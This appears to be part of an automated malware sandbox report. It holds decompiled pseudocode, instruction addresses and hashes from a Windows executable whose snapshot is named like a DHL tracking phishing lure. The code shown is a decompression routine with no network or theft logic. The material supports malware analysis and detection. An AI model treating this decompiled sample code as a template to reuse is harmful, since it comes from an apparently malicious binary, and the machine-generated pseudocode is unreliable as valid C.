                    											if(__ebx >= 0x100) {
                    												goto L54;
                    											}
                    											L41:
                    											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                    											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                    											__ecx =  *(__ebp - 0x58);
                    											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                    											 *(__ebp - 0x48) = __eax;
                    											__eax = __eax + 1;
                    											__eax = __eax << 8;
                    											__eax = __eax + __ebx;
                    											__esi =  *(__ebp - 0x58) + __eax * 2;
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    											__ax =  *__esi;
                    											 *(__ebp - 0x54) = __esi;
                    											__edx = __ax & 0x0000ffff;
                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                    											__eflags =  *(__ebp - 0xc) - __ecx;
                    											if( *(__ebp - 0xc) >= __ecx) {
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    												__cx = __ax;
                    												 *(__ebp - 0x40) = 1;
                    												__cx = __ax >> 5;
                    												__eflags = __eax;
                    												__ebx = __ebx + __ebx + 1;
                    												 *__esi = __ax;
                    											} else {
                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                    												 *(__ebp - 0x10) = __ecx;
                    												0x800 = 0x800 - __edx;
                    												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    												__ebx = __ebx + __ebx;
                    												 *__esi = __cx;
                    											}
                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                    											 *(__ebp - 0x44) = __ebx;
                    											if( *(__ebp - 0x10) >= 0x1000000) {
                    												goto L39;
                    											} else {
                    												L45:
                    												goto L37;
                    											}
                    										case 0xe:
                    											L46:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												L160:
                    												 *(__ebp - 0x88) = 0xe;
                    												goto L170;
                    											}
                    											L47:
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t156 = __ebp - 0x70;
                    											 *_t156 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t156;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											while(1) {
                    												L48:
                    												__eflags = __ebx - 0x100;
                    												if(__ebx >= 0x100) {
                    													break;
                    												}
                    												L49:
                    												__eax =  *(__ebp - 0x58);
                    												__edx = __ebx + __ebx;
                    												__ecx =  *(__ebp - 0x10);
                    												__esi = __edx + __eax;
                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                    												__ax =  *__esi;
                    												 *(__ebp - 0x54) = __esi;
                    												__edi = __ax & 0x0000ffff;
                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    												__eflags =  *(__ebp - 0xc) - __ecx;
                    												if( *(__ebp - 0xc) >= __ecx) {
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    													__cx = __ax;
                    													_t170 = __edx + 1; // 0x1
                    													__ebx = _t170;
                    													__cx = __ax >> 5;
                    													__eflags = __eax;
                    													 *__esi = __ax;
                    												} else {
                    													 *(__ebp - 0x10) = __ecx;
                    													0x800 = 0x800 - __edi;
                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    													__ebx = __ebx + __ebx;
                    													 *__esi = __cx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													continue;
                    												} else {
                    													L53:
                    													goto L46;
                    												}
                    											}
                    											L54:
                    											_t173 = __ebp - 0x34;
                    											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                    											__eflags =  *_t173;
                    											goto L55;
                    										case 0xf:
                    											L58:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												L161:
                    												 *(__ebp - 0x88) = 0xf;
                    												goto L170;
                    											}
                    											L59:
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t203 = __ebp - 0x70;
                    											 *_t203 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t203;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L60:
                    											__eflags = __ebx - 0x100;
                    											if(__ebx >= 0x100) {
                    												L55:
                    												__al =  *(__ebp - 0x44);
                    												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                    												goto L56;
                    											}
                    											L61:
                    											__eax =  *(__ebp - 0x58);
                    											__edx = __ebx + __ebx;
                    											__ecx =  *(__ebp - 0x10);
                    											__esi = __edx + __eax;
                    											__ecx =  *(__ebp - 0x10) >> 0xb;
                    											__ax =  *__esi;
                    											 *(__ebp - 0x54) = __esi;
                    											__edi = __ax & 0x0000ffff;
                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    											__eflags =  *(__ebp - 0xc) - __ecx;
                    											if( *(__ebp - 0xc) >= __ecx) {
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    												__cx = __ax;
                    												_t217 = __edx + 1; // 0x1
                    												__ebx = _t217;
                    												__cx = __ax >> 5;
                    												__eflags = __eax;
                    												 *__esi = __ax;
                    											} else {
                    												 *(__ebp - 0x10) = __ecx;
                    												0x800 = 0x800 - __edi;
                    												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    												__ebx = __ebx + __ebx;
                    												 *__esi = __cx;
                    											}
                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                    											 *(__ebp - 0x44) = __ebx;
                    											if( *(__ebp - 0x10) >= 0x1000000) {
                    												goto L60;
                    											} else {
                    												L65:
                    												goto L58;
                    											}
                    										case 0x10:
                    											L109:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												L165:
                    												 *(__ebp - 0x88) = 0x10;
                    												goto L170;
                    											}
                    											L110:
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t365 = __ebp - 0x70;
                    											 *_t365 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t365;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											goto L111;
                    										case 0x11:
                    											L69:
                    											__esi =  *(__ebp - 0x58);
                    											 *(__ebp - 0x84) = 0x12;
                    											goto L132;
                    										case 0x12:
                    											L128:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												L131:
                    												__eax =  *(__ebp - 0x58);
                    												 *(__ebp - 0x84) = 0x13;
                    												__esi =  *(__ebp - 0x58) + 2;
                    												L132:
                    												 *(_t644 - 0x54) = _t642;
                    												goto L133;
                    											}
                    											L129:
                    											__eax =  *(__ebp - 0x4c);
                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                    											__ecx =  *(__ebp - 0x58);
                    											__eax =  *(__ebp - 0x4c) << 4;
                    											__eflags = __eax;
                    											__eax =  *(__ebp - 0x58) + __eax + 4;
                    											goto L130;
                    										case 0x13:
                    											L141:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												L143:
                    												_t469 = __ebp - 0x58;
                    												 *_t469 =  *(__ebp - 0x58) + 0x204;
                    												__eflags =  *_t469;
                    												 *(__ebp - 0x30) = 0x10;
                    												 *(__ebp - 0x40) = 8;
                    												L144:
                    												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                    												L145:
                    												 *(_t644 - 0x50) = 1;
                    												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                    												goto L149;
                    											}
                    											L142:
                    											__eax =  *(__ebp - 0x4c);
                    											__ecx =  *(__ebp - 0x58);
                    											__eax =  *(__ebp - 0x4c) << 4;
                    											 *(__ebp - 0x30) = 8;
                    											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                    											L130:
                    											 *(__ebp - 0x58) = __eax;
                    											 *(__ebp - 0x40) = 3;
                    											goto L144;
                    										case 0x14:
                    											L156:
                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                    											__eax =  *(__ebp - 0x80);
                    											while(1) {
                    												L140:
                    												 *(_t644 - 0x88) = _t537;
                    												goto L1;
                    											}
                    										case 0x15:
                    											L91:
                    											__eax = 0;
                    											__eflags =  *(__ebp - 0x38) - 7;
                    											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    											__al = __al & 0x000000fd;
                    											__eax = (__eflags >= 0) - 1 + 0xb;
                    											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                    											goto L120;
                    										case 0x16:
                    											goto L0;
                    										case 0x17:
                    											while(1) {
                    												L145:
                    												 *(_t644 - 0x50) = 1;
                    												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                    												goto L149;
                    											}
                    										case 0x18:
                    											goto L146;
                    										case 0x19:
                    											L94:
                    											__eflags = __ebx - 4;
                    											if(__ebx < 4) {
                    												L98:
                    												 *(__ebp - 0x2c) = __ebx;
                    												L119:
                    												_t393 = __ebp - 0x2c;
                    												 *_t393 =  *(__ebp - 0x2c) + 1;
                    												__eflags =  *_t393;
                    												L120:
                    												__eax =  *(__ebp - 0x2c);
                    												__eflags = __eax;
                    												if(__eax == 0) {
                    													L166:
                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                    													goto L170;
                    												}
                    												L121:
                    												__eflags = __eax -  *(__ebp - 0x60);
                    												if(__eax >  *(__ebp - 0x60)) {
                    													goto L171;
                    												}
                    												L122:
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                    												__eax =  *(__ebp - 0x30);
                    												_t400 = __ebp - 0x60;
                    												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                    												__eflags =  *_t400;
                    												goto L123;
                    											}
                    											L95:
                    											__ecx = __ebx;
                    											__eax = __ebx;
                    											__ecx = __ebx >> 1;
                    											__eax = __ebx & 0x00000001;
                    											__ecx = (__ebx >> 1) - 1;
                    											__al = __al | 0x00000002;
                    											__eax = (__ebx & 0x00000001) << __cl;
                    											__eflags = __ebx - 0xe;
                    											 *(__ebp - 0x2c) = __eax;
                    											if(__ebx >= 0xe) {
                    												L97:
                    												__ebx = 0;
                    												 *(__ebp - 0x48) = __ecx;
                    												L102:
                    												__eflags =  *(__ebp - 0x48);
                    												if( *(__ebp - 0x48) <= 0) {
                    													L107:
                    													__eax = __eax + __ebx;
                    													 *(__ebp - 0x40) = 4;
                    													 *(__ebp - 0x2c) = __eax;
                    													__eax =  *(__ebp - 4);
                    													__eax =  *(__ebp - 4) + 0x644;
                    													__eflags = __eax;
                    													L108:
                    													__ebx = 0;
                    													 *(__ebp - 0x58) = __eax;
                    													 *(__ebp - 0x50) = 1;
                    													 *(__ebp - 0x44) = 0;
                    													 *(__ebp - 0x48) = 0;
                    													L112:
                    													__eax =  *(__ebp - 0x40);
                    													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                    														L118:
                    														_t391 = __ebp - 0x2c;
                    														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                    														__eflags =  *_t391;
                    														goto L119;
                    													}
                    													L113:
                    													__eax =  *(__ebp - 0x50);
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    													__eax =  *(__ebp - 0x58);
                    													__esi = __edi + __eax;
                    													 *(__ebp - 0x54) = __esi;
                    													__ax =  *__esi;
                    													__ecx = __ax & 0x0000ffff;
                    													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                    													__eflags =  *(__ebp - 0xc) - __edx;
                    													if( *(__ebp - 0xc) >= __edx) {
                    														__ecx = 0;
                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                    														__ecx = 1;
                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                    														__ebx = 1;
                    														__ecx =  *(__ebp - 0x48);
                    														__ebx = 1 << __cl;
                    														__ecx = 1 << __cl;
                    														__ebx =  *(__ebp - 0x44);
                    														__ebx =  *(__ebp - 0x44) | __ecx;
                    														__cx = __ax;
                    														__cx = __ax >> 5;
                    														__eax = __eax - __ecx;
                    														__edi = __edi + 1;
                    														__eflags = __edi;
                    														 *(__ebp - 0x44) = __ebx;
                    														 *__esi = __ax;
                    														 *(__ebp - 0x50) = __edi;
                    													} else {
                    														 *(__ebp - 0x10) = __edx;
                    														0x800 = 0x800 - __ecx;
                    														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                    														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    														 *__esi = __dx;
                    													}
                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                    													if( *(__ebp - 0x10) >= 0x1000000) {
                    														L111:
                    														_t368 = __ebp - 0x48;
                    														 *_t368 =  *(__ebp - 0x48) + 1;
                    														__eflags =  *_t368;
                    														goto L112;
                    													} else {
                    														L117:
                    														goto L109;
                    													}
                    												}
                    												L103:
                    												__ecx =  *(__ebp - 0xc);
                    												__ebx = __ebx + __ebx;
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                    												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                    													__ecx =  *(__ebp - 0x10);
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    													__ebx = __ebx | 0x00000001;
                    													__eflags = __ebx;
                    													 *(__ebp - 0x44) = __ebx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													L101:
                    													_t338 = __ebp - 0x48;
                    													 *_t338 =  *(__ebp - 0x48) - 1;
                    													__eflags =  *_t338;
                    													goto L102;
                    												} else {
                    													L106:
                    													goto L99;
                    												}
                    											}
                    											L96:
                    											__edx =  *(__ebp - 4);
                    											__eax = __eax - __ebx;
                    											 *(__ebp - 0x40) = __ecx;
                    											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                    											goto L108;
                    										case 0x1a:
                    											L56:
                    											__eflags =  *(__ebp - 0x64);
                    											if( *(__ebp - 0x64) == 0) {
                    												L162:
                    												 *(__ebp - 0x88) = 0x1a;
                    												goto L170;
                    											}
                    											L57:
                    											__ecx =  *(__ebp - 0x68);
                    											__al =  *(__ebp - 0x5c);
                    											__edx =  *(__ebp - 8);
                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    											 *( *(__ebp - 0x68)) = __al;
                    											__ecx =  *(__ebp - 0x14);
                    											 *(__ecx +  *(__ebp - 8)) = __al;
                    											__eax = __ecx + 1;
                    											__edx = 0;
                    											_t192 = __eax %  *(__ebp - 0x74);
                    											__eax = __eax /  *(__ebp - 0x74);
                    											__edx = _t192;
                    											goto L80;
                    										case 0x1b:
                    											L76:
                    											__eflags =  *(__ebp - 0x64);
                    											if( *(__ebp - 0x64) == 0) {
                    												L163:
                    												 *(__ebp - 0x88) = 0x1b;
                    												goto L170;
                    											}
                    											L77:
                    											__eax =  *(__ebp - 0x14);
                    											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    											__eflags = __eax -  *(__ebp - 0x74);
                    											if(__eax >=  *(__ebp - 0x74)) {
                    												__eax = __eax +  *(__ebp - 0x74);
                    												__eflags = __eax;
                    											}
                    											__edx =  *(__ebp - 8);
                    											__cl =  *(__eax + __edx);
                    											__eax =  *(__ebp - 0x14);
                    											 *(__ebp - 0x5c) = __cl;
                    											 *(__eax + __edx) = __cl;
                    											__eax = __eax + 1;
                    											__edx = 0;
                    											_t275 = __eax %  *(__ebp - 0x74);
                    											__eax = __eax /  *(__ebp - 0x74);
                    											__edx = _t275;
                    											__eax =  *(__ebp - 0x68);
                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    											_t284 = __ebp - 0x64;
                    											 *_t284 =  *(__ebp - 0x64) - 1;
                    											__eflags =  *_t284;
                    											 *( *(__ebp - 0x68)) = __cl;
                    											L80:
                    											 *(__ebp - 0x14) = __edx;
                    											goto L81;
                    										case 0x1c:
                    											while(1) {
                    												L123:
                    												__eflags =  *(__ebp - 0x64);
                    												if( *(__ebp - 0x64) == 0) {
                    													break;
                    												}
                    												L124:
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__edx =  *(__ebp - 8);
                    												__cl =  *(__eax + __edx);
                    												__eax =  *(__ebp - 0x14);
                    												 *(__ebp - 0x5c) = __cl;
                    												 *(__eax + __edx) = __cl;
                    												__eax = __eax + 1;
                    												__edx = 0;
                    												_t414 = __eax %  *(__ebp - 0x74);
                    												__eax = __eax /  *(__ebp - 0x74);
                    												__edx = _t414;
                    												__eax =  *(__ebp - 0x68);
                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                    												__eflags =  *(__ebp - 0x30);
                    												 *( *(__ebp - 0x68)) = __cl;
                    												 *(__ebp - 0x14) = _t414;
                    												if( *(__ebp - 0x30) > 0) {
                    													continue;
                    												} else {
                    													L127:
                    													L81:
                    													 *(__ebp - 0x88) = 2;
                    													goto L1;
                    												}
                    											}
                    											L167:
                    											 *(__ebp - 0x88) = 0x1c;
                    											goto L170;
                    									}
                    								}
                    								L171:
                    								_t539 = _t538 | 0xffffffff;
                    								goto L172;
                    							}
                    						}
                    					}
                    				}
                    			}















                    0x00406682
                    0x00406686
                    0x004066a8
                    0x004066a8
                    0x004066ab
                    0x004066b5
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x00406688
                    0x00406688
                    0x0040668b
                    0x0040668f
                    0x00406692
                    0x00406692
                    0x00406695
                    0x00000000
                    0x00000000
                    0x0040673f
                    0x0040673f
                    0x00406743
                    0x00406761
                    0x00406761
                    0x00406761
                    0x00406761
                    0x00406768
                    0x0040676f
                    0x00406776
                    0x00406776
                    0x0040677d
                    0x00406780
                    0x00406787
                    0x00000000
                    0x0040678a
                    0x00406745
                    0x00406745
                    0x00406748
                    0x0040674b
                    0x0040674e
                    0x00406755
                    0x00406699
                    0x00406699
                    0x0040669c
                    0x00000000
                    0x00000000
                    0x00406830
                    0x00406830
                    0x00406833
                    0x00406734
                    0x00406734
                    0x00406734
                    0x00000000
                    0x0040673a
                    0x00000000
                    0x0040646a
                    0x0040646a
                    0x0040646c
                    0x00406473
                    0x00406474
                    0x00406476
                    0x00406479
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040677d
                    0x0040677d
                    0x00406780
                    0x00406787
                    0x00000000
                    0x0040678a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004064af
                    0x004064af
                    0x004064b2
                    0x004064e8
                    0x004064e8
                    0x00406618
                    0x00406618
                    0x00406618
                    0x00406618
                    0x0040661b
                    0x0040661b
                    0x0040661e
                    0x00406620
                    0x004068aa
                    0x004068aa
                    0x00000000
                    0x004068aa
                    0x00406626
                    0x00406626
                    0x00406629
                    0x00000000
                    0x00000000
                    0x0040662f
                    0x0040662f
                    0x00406633
                    0x00406636
                    0x00406636
                    0x00406636
                    0x00000000
                    0x00406636
                    0x004064b4
                    0x004064b4
                    0x004064b6
                    0x004064b8
                    0x004064ba
                    0x004064bd
                    0x004064be
                    0x004064c0
                    0x004064c2
                    0x004064c5
                    0x004064c8
                    0x004064de
                    0x004064de
                    0x004064e3
                    0x0040651b
                    0x0040651b
                    0x0040651f
                    0x00406548
                    0x0040654b
                    0x0040654d
                    0x00406554
                    0x00406557
                    0x0040655a
                    0x0040655a
                    0x0040655f
                    0x0040655f
                    0x00406561
                    0x00406564
                    0x0040656b
                    0x0040656e
                    0x0040659b
                    0x0040659b
                    0x0040659e
                    0x004065a1
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00000000
                    0x00406615
                    0x004065a3
                    0x004065a3
                    0x004065a9
                    0x004065ac
                    0x004065af
                    0x004065b2
                    0x004065b5
                    0x004065b8
                    0x004065bb
                    0x004065be
                    0x004065c1
                    0x004065c4
                    0x004065dd
                    0x004065df
                    0x004065e2
                    0x004065e3
                    0x004065e6
                    0x004065e8
                    0x004065eb
                    0x004065ed
                    0x004065ef
                    0x004065f2
                    0x004065f4
                    0x004065f7
                    0x004065fb
                    0x004065fd
                    0x004065fd
                    0x004065fe
                    0x00406601
                    0x00406604
                    0x004065c6
                    0x004065c6
                    0x004065ce
                    0x004065d3
                    0x004065d5
                    0x004065d8
                    0x004065d8
                    0x00406607
                    0x0040660e
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00000000
                    0x00406610
                    0x00406610
                    0x00000000
                    0x00406610
                    0x0040660e
                    0x00406521
                    0x00406521
                    0x00406524
                    0x00406526
                    0x00406529
                    0x0040652c
                    0x0040652f
                    0x00406531
                    0x00406534
                    0x00406537
                    0x00406537
                    0x0040653a
                    0x0040653a
                    0x0040653d
                    0x00406544
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00000000
                    0x00406546
                    0x00406546
                    0x00000000
                    0x00406546
                    0x00406544
                    0x004064ca
                    0x004064ca
                    0x004064cd
                    0x004064cf
                    0x004064d2
                    0x00000000
                    0x00000000
                    0x00406231
                    0x00406231
                    0x00406235
                    0x0040687a
                    0x0040687a
                    0x00000000
                    0x0040687a
                    0x0040623b
                    0x0040623b
                    0x0040623e
                    0x00406241
                    0x00406244
                    0x00406247
                    0x0040624a
                    0x0040624d
                    0x0040624f
                    0x00406252
                    0x00406255
                    0x00406258
                    0x0040625a
                    0x0040625a
                    0x0040625a
                    0x00000000
                    0x00000000
                    0x004063bc
                    0x004063bc
                    0x004063c0
                    0x00406886
                    0x00406886
                    0x00000000
                    0x00406886
                    0x004063c6
                    0x004063c6
                    0x004063c9
                    0x004063cc
                    0x004063cf
                    0x004063d1
                    0x004063d1
                    0x004063d1
                    0x004063d4
                    0x004063d7
                    0x004063da
                    0x004063dd
                    0x004063e0
                    0x004063e3
                    0x004063e4
                    0x004063e6
                    0x004063e6
                    0x004063e6
                    0x004063e9
                    0x004063ec
                    0x004063ef
                    0x004063f2
                    0x004063f2
                    0x004063f2
                    0x004063f5
                    0x004063f7
                    0x004063f7
                    0x00000000
                    0x00000000
                    0x00406639
                    0x00406639
                    0x00406639
                    0x0040663d
                    0x00000000
                    0x00000000
                    0x00406643
                    0x00406643
                    0x00406646
                    0x00406649
                    0x0040664c
                    0x0040664e
                    0x0040664e
                    0x0040664e
                    0x00406651
                    0x00406654
                    0x00406657
                    0x0040665a
                    0x0040665d
                    0x00406660
                    0x00406661
                    0x00406663
                    0x00406663
                    0x00406663
                    0x00406666
                    0x00406669
                    0x0040666c
                    0x0040666f
                    0x00406672
                    0x00406676
                    0x00406678
                    0x0040667b
                    0x00000000
                    0x0040667d
                    0x0040667d
                    0x004063fa
                    0x004063fa
                    0x00000000
                    0x004063fa
                    0x0040667b
                    0x004068b0
                    0x004068b0
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x004068e7
                    0x004068e7
                    0x00000000
                    0x004068e7
                    0x00406734
                    0x004067b4
                    0x0040677d

                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                    • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                    • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                    • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E00406682() {
                    				void _t533;
                    				signed int _t534;
                    				signed int _t535;
                    				signed int* _t605;
                    				void* _t612;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					if( *(_t612 - 0x40) != 0) {
                    						 *(_t612 - 0x84) = 0x13;
                    						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                    						goto L132;
                    					} else {
                    						__eax =  *(__ebp - 0x4c);
                    						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                    						__ecx =  *(__ebp - 0x58);
                    						__eax =  *(__ebp - 0x4c) << 4;
                    						__eax =  *(__ebp - 0x58) + __eax + 4;
                    						L130:
                    						 *(__ebp - 0x58) = __eax;
                    						 *(__ebp - 0x40) = 3;
                    						L144:
                    						 *(__ebp - 0x7c) = 0x14;
                    						L145:
                    						__eax =  *(__ebp - 0x40);
                    						 *(__ebp - 0x50) = 1;
                    						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                    						L149:
                    						if( *(__ebp - 0x48) <= 0) {
                    							__ecx =  *(__ebp - 0x40);
                    							__ebx =  *(__ebp - 0x50);
                    							0 = 1;
                    							__eax = 1 << __cl;
                    							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                    							__eax =  *(__ebp - 0x7c);
                    							 *(__ebp - 0x44) = __ebx;
                    							while(1) {
                    								L140:
                    								 *(_t612 - 0x88) = _t533;
                    								while(1) {
                    									L1:
                    									_t534 =  *(_t612 - 0x88);
                    									if(_t534 > 0x1c) {
                    										break;
                    									}
                    									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                    										case 0:
                    											if( *(_t612 - 0x6c) == 0) {
                    												goto L170;
                    											}
                    											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                    											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                    											_t534 =  *( *(_t612 - 0x70));
                    											if(_t534 > 0xe1) {
                    												goto L171;
                    											}
                    											_t538 = _t534 & 0x000000ff;
                    											_push(0x2d);
                    											asm("cdq");
                    											_pop(_t569);
                    											_push(9);
                    											_pop(_t570);
                    											_t608 = _t538 / _t569;
                    											_t540 = _t538 % _t569 & 0x000000ff;
                    											asm("cdq");
                    											_t603 = _t540 % _t570 & 0x000000ff;
                    											 *(_t612 - 0x3c) = _t603;
                    											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                    											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                    											_t611 = (0x300 << _t603 + _t608) + 0x736;
                    											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                    												L10:
                    												if(_t611 == 0) {
                    													L12:
                    													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                    													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                    													goto L15;
                    												} else {
                    													goto L11;
                    												}
                    												do {
